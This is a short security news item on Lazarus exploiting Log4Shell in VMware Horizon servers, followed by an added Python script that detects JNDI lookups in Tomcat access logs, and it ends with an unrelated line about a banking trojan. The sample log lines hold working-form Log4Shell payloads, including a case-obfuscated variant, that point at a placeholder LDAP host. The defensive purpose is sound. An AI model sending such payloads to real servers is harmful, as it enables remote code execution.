North Korean state-sponsored hacking operation Lazarus has been targeting VMware Horizon servers in malware attacks exploiting the Log4Shell remote code execution flaw, tracked as CVE-2021-44228, reports BleepingComputer.
Vulnerable VMware Horizon servers have been attacked since last month by Lazarus, which has been abusing Log4Shell via the servers' Apache Tomcat service to facilitate PowerShell command execution and eventual NukeSped backdoor installation, a report from AhnLab's ASEC revealed.
Researchers found that the C++-based NukeSped backdoor features screenshot capturing, file accessing, and key press recording capabilities, and has been leveraged by Lazarus for deploying a console-based information-stealer malware.
The info-stealer was found to exfiltrate browser search histories and account credentials, the names of recently used MS Office and Hancom 2010 files, and email account data from MS Office Outlook, Outlook Express, and Windows Live Mail.
The report also showed that in some intrusions Lazarus used Log4Shell to distribute the Jin Miner cryptominer instead of the NukeSped backdoor.
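The attack chain described above starts with a Log4Shell (CVE-2021-44228) request reaching the Horizon server's Apache Tomcat service, which means the first detection opportunity is the Tomcat access log. The following is an added example, not code from the page, BleepingComputer, or AhnLab's report: it scans combined-format access log lines for the JNDI lookup syntax that Log4Shell exploitation relies on, after collapsing the `${lower:...}`/`${upper:...}` nested lookups that are commonly used to split the keyword. The log lines, IP addresses (documentation ranges) and request paths are constructed for the example and are assumptions, not indicators from the report.

```python
from __future__ import annotations

import re
from dataclasses import dataclass

# Constructed sample of Tomcat access log lines in combined format (assumption:
# request, referer and user-agent are the three quoted fields, in that order).
# None of these lines come from the page or from AhnLab's report.
SAMPLE_ACCESS_LOG = """\
10.0.0.5 - - [01/May/2022:10:12:01 +0000] "GET /portal/webclient/index.html HTTP/1.1" 200 1532 "-" "Mozilla/5.0"
10.0.0.9 - - [01/May/2022:10:12:07 +0000] "GET /portal/info.jsp HTTP/1.1" 200 88 "-" "${jndi:ldap://203.0.113.10:1389/a}"
10.0.0.9 - - [01/May/2022:10:12:09 +0000] "GET /portal/info.jsp HTTP/1.1" 200 88 "-" "${${lower:j}ndi:${lower:l}dap://203.0.113.10:1389/a}"
10.0.0.7 - - [01/May/2022:10:12:15 +0000] "POST /broker/xml HTTP/1.1" 200 410 "-" "VMware Horizon Client"
"""

# The log4j lookup that Log4Shell abuses: "${jndi:<scheme>:...". Matched after
# normalisation so that split keywords are caught as well.
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)

# A nested case-changing lookup that evaluates to a single literal, e.g. ${lower:j} -> j
CASE_LOOKUP = re.compile(r"\$\{\s*(?:lower|upper)\s*:\s*([^${}]*?)\s*\}", re.IGNORECASE)

# Quoted fields of a combined-format line, honouring backslash escapes.
QUOTED_FIELD = re.compile(r'"((?:[^"\\]|\\.)*)"')
FIELD_NAMES = ("request", "referer", "user_agent")


def normalise_lookups(value: str) -> str:
    """Collapse ${lower:x}/${upper:x} lookups (innermost first) until none remain."""
    previous = None
    while previous != value:
        previous = value
        value = CASE_LOOKUP.sub(lambda m: m.group(1), value)
    return value


@dataclass
class Finding:
    line_no: int      # 1-based line number in the scanned text
    client_ip: str    # first token of the access log line
    field: str        # which quoted field carried the lookup
    raw: str          # the field value exactly as logged


def scan_access_log(text: str) -> list[Finding]:
    """Return one Finding per quoted field that contains a JNDI lookup."""
    findings: list[Finding] = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        if not line.strip():
            continue
        client_ip = line.split(" ", 1)[0]
        quoted = QUOTED_FIELD.findall(line)
        for field, value in zip(FIELD_NAMES, quoted):
            if JNDI_LOOKUP.search(normalise_lookups(value)):
                findings.append(Finding(line_no, client_ip, field, value))
    return findings


if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_ACCESS_LOG):
        print(f"line {f.line_no}: {f.client_ip} sent JNDI lookup in {f.field}: {f.raw}")
```

Running the script reports the two lines from 10.0.0.9 and ignores the legitimate Horizon client traffic; the split-keyword line is caught only because the normalisation step runs before the keyword match. In a real deployment the same scan would be paired with a process-creation alert for PowerShell children of the Tomcat service process, which is the next step in the chain the report describes.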
More than 40 banks in Mexico and Brazil have been subjected to a new malware campaign involving a new variant of the BBTok banking trojan meant to exfiltrate data for hijacking online bank accounts, according to The Hacker News.